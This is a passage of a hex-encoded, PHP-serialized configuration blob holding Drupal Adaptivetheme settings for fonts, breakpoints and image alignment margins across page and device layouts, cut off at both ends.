96e67735f666f6e745f747970656b69745f6e616d6573223b733a303a22223b733a31393a2273657474696e67735f666f6e745f6c6f63616c223b733a303a22223b733a32353a2273657474696e67735f666f6e745f6c6f63616c5f6e616d6573223b733a303a22223b733a32323a2273657474696e67735f666f6e745f66616c6c6261636b223b733a31303a2273616e735f7365726966223b733a34343a2273657474696e67735f666f6e745f6c696e655f6865696768745f6d756c7469706c6965725f64656661756c74223b733a333a22312e35223b733a34323a2273657474696e67735f666f6e745f6c696e655f6865696768745f6d756c7469706c6965725f6c61726765223b733a353a22312e313235223b733a31383a2273657474696e67735f666f6e745f62617365223b733a343a226e6f6e65223b733a32363a2273657474696e67735f666f6e745f776562736166655f62617365223b733a313a2230223b733a32333a2273657474696e67735f666f6e745f73697a655f62617365223b733a303a22223b733a32383a2273657474696e67735f666f6e745f736d6f6f7468696e675f62617365223b693a303b733a32323a2273657474696e67735f666f6e745f736974656e616d65223b733a343a226e6f6e65223b733a33303a2273657474696e67735f666f6e745f776562736166655f736974656e616d65223b733a313a2230223b733a32373a2273657474696e67735f666f6e745f73697a655f736974656e616d65223b733a303a22223b733a33323a2273657474696e67735f666f6e745f736d6f6f7468696e675f736974656e616d65223b693a303b733a32343a2273657474696e67735f666f6e745f73697465736c6f67616e223b733a343a226e6f6e65223b733a33323a2273657474696e67735f666f6e745f776562736166655f73697465736c6f67616e223b733a313a2230223b733a32393a2273657474696e67735f666f6e745f73697a655f73697465736c6f67616e223b733a303a22223b733a33343a2273657474696e67735f666f6e745f736d6f6f7468696e675f73697465736c6f67616e223b693a303b733a32333a2273657474696e67735f666f6e745f706167657469746c65223b733a343a226e6f6e65223b733a33313a2273657474696e67735f666f6e745f776562736166655f706167657469746c65223b733a313a2230223b733a32383a2273657474696e67735f666f6e745f73697a655f706167657469746c65223b733a303a22223b733a33333a2273657474696e67735f666f6e745f736d6f6f7468696e675f706167657469746c65223b693a303b733a32333a2273657474696e67735f666f6e745f6e6f64657469746c65223b733a343a226e6f6e65223b733a33313a2273657474696e67735f666f6e745f776562736166655f6e6f64657469746c65223b733a313a2230223b733a32383a2273657474696e67735f666f6e745f73697a655f6e6f64657469746c65223b733a303a22223b733a33333a2273657474696e67735f666f6e745f736d6f6f7468696e675f6e6f64657469746c65223b693a303b733a33303a2273657474696e67735f666f6e745f6e6f64657469746c655f746561736572223b733a343a226e6f6e65223b733a33383a2273657474696e67735f666f6e745f776562736166655f6e6f64657469746c655f746561736572223b733a313a2230223b733a33353a2273657474696e67735f666f6e745f73697a655f6e6f64657469746c655f746561736572223b733a303a22223b733a34303a2273657474696e67735f666f6e745f736d6f6f7468696e675f6e6f64657469746c655f746561736572223b693a303b733a32363a2273657474696e67735f666f6e745f636f6d6d656e747469746c65223b733a343a226e6f6e65223b733a33343a2273657474696e67735f666f6e745f776562736166655f636f6d6d656e747469746c65223b733a313a2230223b733a33313a2273657474696e67735f666f6e745f73697a655f636f6d6d656e747469746c65223b733a303a22223b733a33363a2273657474696e67735f666f6e745f736d6f6f7468696e675f636f6d6d656e747469746c65223b693a303b733a32343a2273657474696e67735f666f6e745f626c6f636b7469746c65223b733a343a226e6f6e65223b733a33323a2273657474696e67735f666f6e745f776562736166655f626c6f636b7469746c65223b733a313a2230223b733a32393a2273657474696e67735f666f6e745f73697a655f626c6f636b7469746c65223b733a303a22223b733a33343a2273657474696e67735f666f6e745f736d6f6f7468696e675f626c6f636b7469746c65223b693a303b733a31393a2273657474696e67735f666f6e745f6c696e6b73223b733a343a226e6f6e65223b733a32373a2273657474696e67735f666f6e745f776562736166655f6c696e6b73223b733a313a2230223b733a32343a2273657474696e67735f666f6e745f73697a655f6c696e6b73223b733a303a22223b733a32393a2273657474696e67735f666f6e745f736d6f6f7468696e675f6c696e6b73223b693a303b733a31393a2273657474696e67735f666f6e745f6d656e7573223b733a343a226e6f6e65223b733a32373a2273657474696e67735f666f6e745f776562736166655f6d656e7573223b733a313a2230223b733a32343a2273657474696e67735f666f6e745f73697a655f6d656e7573223b733a303a22223b733a32393a2273657474696e67735f666f6e745f736d6f6f7468696e675f6d656e7573223b693a303b733a32383a2273657474696e67735f666f6e745f726573706f6e736976656d656e75223b733a343a226e6f6e65223b733a33363a2273657474696e67735f666f6e745f776562736166655f726573706f6e736976656d656e75223b733a313a2230223b733a33333a2273657474696e67735f666f6e745f73697a655f726573706f6e736976656d656e75223b733a303a22223b733a33383a2273657474696e67735f666f6e745f736d6f6f7468696e675f726573706f6e736976656d656e75223b693a303b733a33353a2273657474696e67735f666f6e745f726573706f6e736976656d656e755f746f67676c65223b733a343a226e6f6e65223b733a34333a2273657474696e67735f666f6e745f776562736166655f726573706f6e736976656d656e755f746f67676c65223b733a313a2230223b733a34303a2273657474696e67735f666f6e745f73697a655f726573706f6e736976656d656e755f746f67676c65223b733a303a22223b733a34353a2273657474696e67735f666f6e745f736d6f6f7468696e675f726573706f6e736976656d656e755f746f67676c65223b693a303b733a32383a2273657474696e67735f666f6e745f696d6167655f63617074696f6e73223b733a343a226e6f6e65223b733a33363a2273657474696e67735f666f6e745f776562736166655f696d6167655f63617074696f6e73223b733a313a2230223b733a33333a2273657474696e67735f666f6e745f73697a655f696d6167655f63617074696f6e73223b733a303a22223b733a33383a2273657474696e67735f666f6e745f736d6f6f7468696e675f696d6167655f63617074696f6e73223b693a303b733a33323a2273657474696e67735f666f6e745f736c69646573686f775f63617074696f6e73223b733a343a226e6f6e65223b733a34303a2273657474696e67735f666f6e745f776562736166655f736c69646573686f775f63617074696f6e73223b733a313a2230223b733a33373a2273657474696e67735f666f6e745f73697a655f736c69646573686f775f63617074696f6e73223b733a303a22223b733a34323a2273657474696e67735f666f6e745f736d6f6f7468696e675f736c69646573686f775f63617074696f6e73223b693a303b733a31383a2273657474696e67735f666f6e745f74616273223b733a343a226e6f6e65223b733a32363a2273657474696e67735f666f6e745f776562736166655f74616273223b733a313a2230223b733a32333a2273657474696e67735f666f6e745f73697a655f74616273223b733a303a22223b733a32383a2273657474696e67735f666f6e745f736d6f6f7468696e675f74616273223b693a303b733a32353a2273657474696e67735f666f6e745f62726561646372756d6273223b733a343a226e6f6e65223b733a33333a2273657474696e67735f666f6e745f776562736166655f62726561646372756d6273223b733a313a2230223b733a33303a2273657474696e67735f666f6e745f73697a655f62726561646372756d6273223b733a303a22223b733a33353a2273657474696e67735f666f6e745f736d6f6f7468696e675f62726561646372756d6273223b693a303b733a31383a2273657474696e67735f666f6e745f68316834223b733a343a226e6f6e65223b733a32363a2273657474696e67735f666f6e745f776562736166655f68316834223b733a313a2230223b733a32383a2273657474696e67735f666f6e745f736d6f6f7468696e675f68316834223b693a303b733a31383a2273657474696e67735f666f6e745f68356836223b733a343a226e6f6e65223b733a32363a2273657474696e67735f666f6e745f776562736166655f68356836223b733a313a2230223b733a32383a2273657474696e67735f666f6e745f736d6f6f7468696e675f68356836223b693a303b733a31363a2273657474696e67735f666f6e745f6831223b733a343a226e6f6e65223b733a32343a2273657474696e67735f666f6e745f776562736166655f6831223b733a313a2230223b733a32313a2273657474696e67735f666f6e745f73697a655f6831223b733a303a22223b733a32363a2273657474696e67735f666f6e745f736d6f6f7468696e675f6831223b693a303b733a31363a2273657474696e67735f666f6e745f6832223b733a343a226e6f6e65223b733a32343a2273657474696e67735f666f6e745f776562736166655f6832223b733a313a2230223b733a32313a2273657474696e67735f666f6e745f73697a655f6832223b733a303a22223b733a32363a2273657474696e67735f666f6e745f736d6f6f7468696e675f6832223b693a303b733a31363a2273657474696e67735f666f6e745f6833223b733a343a226e6f6e65223b733a32343a2273657474696e67735f666f6e745f776562736166655f6833223b733a313a2230223b733a32313a2273657474696e67735f666f6e745f73697a655f6833223b733a303a22223b733a32363a2273657474696e67735f666f6e745f736d6f6f7468696e675f6833223b693a303b733a31363a2273657474696e67735f666f6e745f6834223b733a343a226e6f6e65223b733a32343a2273657474696e67735f666f6e745f776562736166655f6834223b733a313a2230223b733a32313a2273657474696e67735f666f6e745f73697a655f6834223b733a303a22223b733a32363a2273657474696e67735f666f6e745f736d6f6f7468696e675f6834223b693a303b733a31363a2273657474696e67735f666f6e745f6835223b733a343a226e6f6e65223b733a32343a2273657474696e67735f666f6e745f776562736166655f6835223b733a313a2230223b733a32313a2273657474696e67735f666f6e745f73697a655f6835223b733a303a22223b733a32363a2273657474696e67735f666f6e745f736d6f6f7468696e675f6835223b693a303b733a31363a2273657474696e67735f666f6e745f6836223b733a343a226e6f6e65223b733a32343a2273657474696e67735f666f6e745f776562736166655f6836223b733a313a2230223b733a32313a2273657474696e67735f666f6e745f73697a655f6836223b733a303a22223b733a32363a2273657474696e67735f666f6e745f736d6f6f7468696e675f6836223b693a303b733a32333a2273657474696e67735f666f6e745f666f726d6974656d73223b733a343a226e6f6e65223b733a33313a2273657474696e67735f666f6e745f776562736166655f666f726d6974656d73223b733a313a2230223b733a32383a2273657474696e67735f666f6e745f73697a655f666f726d6974656d73223b733a303a22223b733a33333a2273657474696e67735f666f6e745f736d6f6f7468696e675f666f726d6974656d73223b693a303b733a32313a2273657474696e67735f666f6e745f627574746f6e73223b733a343a226e6f6e65223b733a32393a2273657474696e67735f666f6e745f776562736166655f627574746f6e73223b733a313a2230223b733a32363a2273657474696e67735f666f6e745f73697a655f627574746f6e73223b733a303a22223b733a33313a2273657474696e67735f666f6e745f736d6f6f7468696e675f627574746f6e73223b693a303b733a32303a2273657474696e67735f666f6e745f7461626c6573223b733a343a226e6f6e65223b733a32383a2273657474696e67735f666f6e745f776562736166655f7461626c6573223b733a313a2230223b733a32353a2273657474696e67735f666f6e745f73697a655f7461626c6573223b733a303a22223b733a33303a2273657474696e67735f666f6e745f736d6f6f7468696e675f7461626c6573223b693a303b733a32353a2273657474696e67735f666f6e745f626c6f636b71756f746573223b733a343a226e6f6e65223b733a33333a2273657474696e67735f666f6e745f776562736166655f626c6f636b71756f746573223b733a313a2230223b733a33303a2273657474696e67735f666f6e745f73697a655f626c6f636b71756f746573223b733a303a22223b733a33353a2273657474696e67735f666f6e745f736d6f6f7468696e675f626c6f636b71756f746573223b693a303b733a31383a2273657474696e67735f666f6e745f636f6465223b733a343a226e6f6e65223b733a32363a2273657474696e67735f666f6e745f776562736166655f636f6465223b733a313a2230223b733a32333a2273657474696e67735f666f6e745f73697a655f636f6465223b733a303a22223b733a32383a2273657474696e67735f666f6e745f736d6f6f7468696e675f636f6465223b693a303b733a33303a2273657474696e67735f666f6e745f637573746f6d5f73656c6563746f7273223b733a343a226e6f6e65223b733a33383a2273657474696e67735f666f6e745f776562736166655f637573746f6d5f73656c6563746f7273223b733a313a2230223b733a33353a2273657474696e67735f666f6e745f73697a655f637573746f6d5f73656c6563746f7273223b733a303a22223b733a34303a2273657474696e67735f666f6e745f736d6f6f7468696e675f637573746f6d5f73656c6563746f7273223b693a303b733a32353a2273657474696e67735f637573746f6d5f73656c6563746f7273223b733a303a22223b733a33323a2273657474696e67735f627265616b706f696e745f67726f75705f696d61676573223b733a31343a2261745f636f72652e73696d706c65223b733a31373a227461626c655f696d6167655f616c69676e223b613a373a7b733a393a226e6f64655f66756c6c223b613a323a7b733a373a226d617267696e73223b613a36303a7b733a35343a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f776964655f6e6f64655f66756c6c5f746f70223b733a313a2230223b733a35363a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f776964655f6e6f64655f66756c6c5f7269676874223b733a313a2230223b733a35373a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f776964655f6e6f64655f66756c6c5f626f74746f6d223b733a313a2230223b733a35353a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f776964655f6e6f64655f66756c6c5f6c656674223b733a313a2230223b733a36333a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f7461626c657469736f6c6174655f6e6f64655f66756c6c5f746f70223b733a313a2230223b733a36353a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f7461626c657469736f6c6174655f6e6f64655f66756c6c5f7269676874223b733a313a2230223b733a36363a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f7461626c657469736f6c6174655f6e6f64655f66756c6c5f626f74746f6d223b733a313a2230223b733a36343a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f7461626c657469736f6c6174655f6e6f64655f66756c6c5f6c656674223b733a313a2230223b733a35363a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f6d6f62696c655f6e6f64655f66756c6c5f746f70223b733a313a2230223b733a35383a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f6d6f62696c655f6e6f64655f66756c6c5f7269676874223b733a313a2230223b733a35393a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f6d6f62696c655f6e6f64655f66756c6c5f626f74746f6d223b733a313a2230223b733a35373a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f6d6f62696c655f6e6f64655f66756c6c5f6c656674223b733a313a2230223b733a35363a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f776964655f6e6f64655f66756c6c5f746f70223b733a313a2230223b733a35383a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f776964655f6e6f64655f66756c6c5f7269676874223b733a313a2230223b733a35393a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f776964655f6e6f64655f66756c6c5f626f74746f6d223b733a313a2230223b733a35373a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f776964655f6e6f64655f66756c6c5f6c656674223b733a313a2230223b733a36353a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f7461626c657469736f6c6174655f6e6f64655f66756c6c5f746f70223b733a313a2230223b733a36373a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f7461626c657469736f6c6174655f6e6f64655f66756c6c5f7269676874223b733a313a2230223b733a36383a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f7461626c657469736f6c6174655f6e6f64655f66756c6c5f626f74746f6d223b733a313a2230223b733a36363a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f7461626c657469736f6c6174655f6e6f64655f66756c6c5f6c656674223b733a313a2230223b733a35383a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f6d6f62696c655f6e6f64655f66756c6c5f746f70223b733a313a2230223b733a36303a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f6d6f62696c655f6e6f64655f66756c6c5f7269676874223b733a313a2230223b733a36313a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f6d6f62696c655f6e6f64655f66756c6c5f626f74746f6d223b733a313a2230223b733a35393a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f6d6f62696c655f6e6f64655f66756c6c5f6c656674223b733a313a2230223b733a35313a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f66756c6c5f746f70223b733a313a2234223b733a35333a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f66756c6c5f7269676874223b733a313a2230223b733a35343a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f66756c6c5f626f74746f6d223b733a323a223136223b733a35323a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f66756c6c5f6c656674223b733a313a2230223b733a36303a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f7461626c657469736f6c6174655f6e6f64655f66756c6c5f746f70223b733a313a2230223b733a36323a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f7461626c657469736f6c6174655f6e6f64655f66756c6c5f7269676874223b733a313a2230223b733a36333a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f7461626c657469736f6c6174655f6e6f64655f66756c6c5f626f74746f6d223b733a313a2230223b733a36313a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f7461626c657469736f6c6174655f6e6f64655f66756c6c5f6c656674223b733a313a2230223b733a35333a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f66756c6c5f746f70223b733a313a2234223b733a35353a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f66756c6c5f7269676874223b733a313a2230223b733a35363a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f66756c6c5f626f74746f6d223b733a323a223132223b733a35343a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f66756c6c5f6c656674223b733a313a2230223b733a34383a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f66756c6c5f746f70223b733a313a2234223b733a35303a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f66756c6c5f7269676874223b733a313a2230223b733a35313a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f66756c6c5f626f74746f6d223b733a323a223136223b733a34393a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f66756c6c5f6c656674223b733a313a2230223b733a35373a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f7461626c657469736f6c6174655f6e6f64655f66756c6c5f746f70223b733a313a2230223b733a35393a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f7461626c657469736f6c6174655f6e6f64655f66756c6c5f7269676874223b733a313a2230223b733a36303a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f7461626c657469736f6c6174655f6e6f64655f66756c6c5f626f74746f6d223b733a313a2230223b733a35383a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f7461626c657469736f6c6174655f6e6f64655f66756c6c5f6c656674223b733a313a2230223b733a35303a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f66756c6c5f746f70223b733a313a2234223b733a35323a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f66756c6c5f7269676874223b733a313a2230223b733a35333a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f66756c6c5f626f74746f6d223b733a323a223132223b733a35313a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f66756c6c5f6c656674223b733a313a2230223b733a35303a2273657474696e67735f696d6167655f616c69676e6d656e745f736c696465725f776964655f6e6f64655f66756c6c5f746f70223b733a313a2230223b733a35323a2273657474696e67735f696d6167655f616c69676e6d656e745f736c696465725f776964655f6e6f64655f66756c6c5f7269676874223b733a313a2230223b733a35333a2273657474696e67735f696d6167655f616c69676e6d656e745f736c696465725f776964655f6e6f64655f66756c6c5f626f74746f6d223b733a313a2230223b733a35313a2273657474696e67735f696d6167655f616c69676e6d656e745f736c696465725f776964655f6e6f64655f66756c6c5f6c656674223b733a313a2230223b733a35393a2273657474696e67735f696d6167655f616c69676e6d656e745f736c696465725f7461626c657469736f6c6174655f6e6f64655f66756c6c5f746f70223b733a313a2230223b733a36313a2273657474696e67735f696d6167655f616c69676e6d656e745f736c696465725f7461626c657469736f6c6174655f6e6f64655f66756c6c5f7269676874223b733a313a2230223b733a36323a2273657474696e67735f696d6167655f616c69676e6d656e745f736c696465725f7461626c657469736f6c6174655f6e6f64655f66756c6c5f626f74746f6d223b733a313a2230223b733a36303a2273657474696e67735f696d6167655f616c69676e6d656e745f736c696465725f7461626c657469736f6c6174655f6e6f64655f66756c6c5f6c656674223b733a313a2230223b733a35323a2273657474696e67735f696d6167655f616c69676e6d656e745f736c696465725f6d6f62696c655f6e6f64655f66756c6c5f746f70223b733a313a2230223b733a35343a2273657474696e67735f696d6167655f616c69676e6d656e745f736c696465725f6d6f62696c655f6e6f64655f66756c6c5f7269676874223b733a313a2230223b733a35353a2273657474696e67735f696d6167655f616c69676e6d656e745f736c696465725f6d6f62696c655f6e6f64655f66756c6c5f626f74746f6d223b733a313a2230223b733a35333a2273657474696e67735f696d6167655f616c69676e6d656e745f736c696465725f6d6f62696c655f6e6f64655f66756c6c5f6c656674223b733a313a2230223b7d733a373a226f7074696f6e73223b613a31353a7b733a34373a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f66756c6c223b733a363a2263656e746572223b733a34393a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f66756c6c223b733a363a2263656e746572223b733a34343a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f66756c6c223b733a363a2263656e746572223b733a34363a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f66756c6c223b733a363a2263656e746572223b733a35303a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f776964655f6e6f64655f66756c6c223b4e3b733a35393a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f7461626c657469736f6c6174655f6e6f64655f66756c6c223b4e3b733a35323a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f6d6f62696c655f6e6f64655f66756c6c223b4e3b733a35323a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f776964655f6e6f64655f66756c6c223b4e3b733a36313a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f7461626c657469736f6c6174655f6e6f64655f66756c6c223b4e3b733a35343a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f6d6f62696c655f6e6f64655f66756c6c223b4e3b733a35363a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f7461626c657469736f6c6174655f6e6f64655f66756c6c223b4e3b733a35333a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f7461626c657469736f6c6174655f6e6f64655f66756c6c223b4e3b733a34363a2273657474696e67735f696d6167655f616c69676e6d656e745f736c696465725f776964655f6e6f64655f66756c6c223b4e3b733a35353a2273657474696e67735f696d6167655f616c69676e6d656e745f736c696465725f7461626c657469736f6c6174655f6e6f64655f66756c6c223b4e3b733a34383a2273657474696e67735f696d6167655f616c69676e6d656e745f736c696465725f6d6f62696c655f6e6f64655f66756c6c223b4e3b7d7d733a31313a226e6f64655f746561736572223b613a323a7b733a373a226d617267696e73223b613a36303a7b733a35363a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f776964655f6e6f64655f7465617365725f746f70223b733a313a2230223b733a35383a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f776964655f6e6f64655f7465617365725f7269676874223b733a313a2230223b733a35393a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f776964655f6e6f64655f7465617365725f626f74746f6d223b733a313a2230223b733a35373a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f776964655f6e6f64655f7465617365725f6c656674223b733a313a2230223b733a36353a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f7461626c657469736f6c6174655f6e6f64655f7465617365725f746f70223b733a313a2230223b733a36373a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f7461626c657469736f6c6174655f6e6f64655f7465617365725f7269676874223b733a313a2230223b733a36383a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f7461626c657469736f6c6174655f6e6f64655f7465617365725f626f74746f6d223b733a313a2230223b733a36363a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f7461626c657469736f6c6174655f6e6f64655f7465617365725f6c656674223b733a313a2230223b733a35383a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f6d6f62696c655f6e6f64655f7465617365725f746f70223b733a313a2230223b733a36303a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f6d6f62696c655f6e6f64655f7465617365725f7269676874223b733a313a2230223b733a36313a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f6d6f62696c655f6e6f64655f7465617365725f626f74746f6d223b733a313a2230223b733a35393a2273657474696e67735f696d6167655f616c69676e6d656e745f616374697669746965735f6d6f62696c655f6e6f64655f7465617365725f6c656674223b733a313a2230223b733a35383a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f776964655f6e6f64655f7465617365725f746f70223b733a313a2230223b733a36303a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f776964655f6e6f64655f7465617365725f7269676874223b733a313a2230223b733a36313a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f776964655f6e6f64655f7465617365725f626f74746f6d223b733a313a2230223b733a35393a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f776964655f6e6f64655f7465617365725f6c656674223b733a313a2230223b733a36373a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f7461626c657469736f6c6174655f6e6f64655f7465617365725f746f70223b733a313a2230223b733a36393a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f7461626c657469736f6c6174655f6e6f64655f7465617365725f7269676874223b733a313a2230223b733a37303a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f7461626c657469736f6c6174655f6e6f64655f7465617365725f626f74746f6d223b733a313a2230223b733a36383a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f7461626c657469736f6c6174655f6e6f64655f7465617365725f6c656674223b733a313a2230223b733a36303a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f6d6f62696c655f6e6f64655f7465617365725f746f70223b733a313a2230223b733a36323a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f6d6f62696c655f6e6f64655f7465617365725f7269676874223b733a313a2230223b733a36333a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f6d6f62696c655f6e6f64655f7465617365725f626f74746f6d223b733a313a2230223b733a36313a2273657474696e67735f696d6167655f616c69676e6d656e745f616e6e6f756e63656d656e745f6d6f62696c655f6e6f64655f7465617365725f6c656674223b733a313a2230223b733a35333a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f7465617365725f746f70223b733a313a2234223b733a35353a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f7465617365725f7269676874223b733a313a2230223b733a35363a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f7465617365725f626f74746f6d223b733a313a2238223b733a35343a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f7465617365725f6c656674223b733a323a223136223b733a36323a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f7461626c657469736f6c6174655f6e6f64655f7465617365725f746f70223b733a313a2230223b733a36343a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f7461626c657469736f6c6174655f6e6f64655f7465617365725f7269676874223b733a313a2230223b733a36353a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f7461626c657469736f6c6174655f6e6f64655f7465617365725f626f74746f6d223b733a313a2230223b733a36333a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f7461626c657469736f6c6174655f6e6f64655f7465617365725f6c656674223b733a313a2230223b733a35353a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f7465617365725f746f70223b733a313a2234223b733a35373a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f7465617365725f7269676874223b733a313a2230223b733a35383a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f7465617365725f626f74746f6d223b733a323a223132223b733a35363a2273657474696e67735f696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f7465617365725f6c656674223b733a313a2230223b733a35303a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f7465617365725f746f70223b733a313a2234223b733a35323a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f7465617365725f7269676874223b733a313a2230223b733a35333a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f7465617365725f626f74746f6d223b733a313a2238223b733a35313a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f7465617365725f6c656674223b733a323a223136223b733a35393a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f7461626c657469736f6c6174655f6e6f64655f7465617365725f746f70223b733a313a2230223b733a36313a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f7461626c657469736f6c6174655f6e6f64655f7465617365725f7269676874223b733a313a2230223b733a36323a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f7461626c657469736f6c6174655f6e6f64655f7465617365725f626f74746f6d223b733a313a2230223b733a36303a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f7461626c657469736f6c6174655f6e6f64655f7465617365725f6c656674223b733a313a2230223b733a35323a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f7465617365725f746f70223b733a313a2234223b733a35343a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f7465617365725f7269676874223b733a313a2230223b733a35353a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f7465617365725f626f74746f6d223b733a323a223132223b733a35333a2273657474696e67735f696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f7465617365725f6c656674223b733a313a2230223b733a35323a2273657474696e67735f696d6167655f616c69676e6d656e745f736c696465725f776964655f6e6f6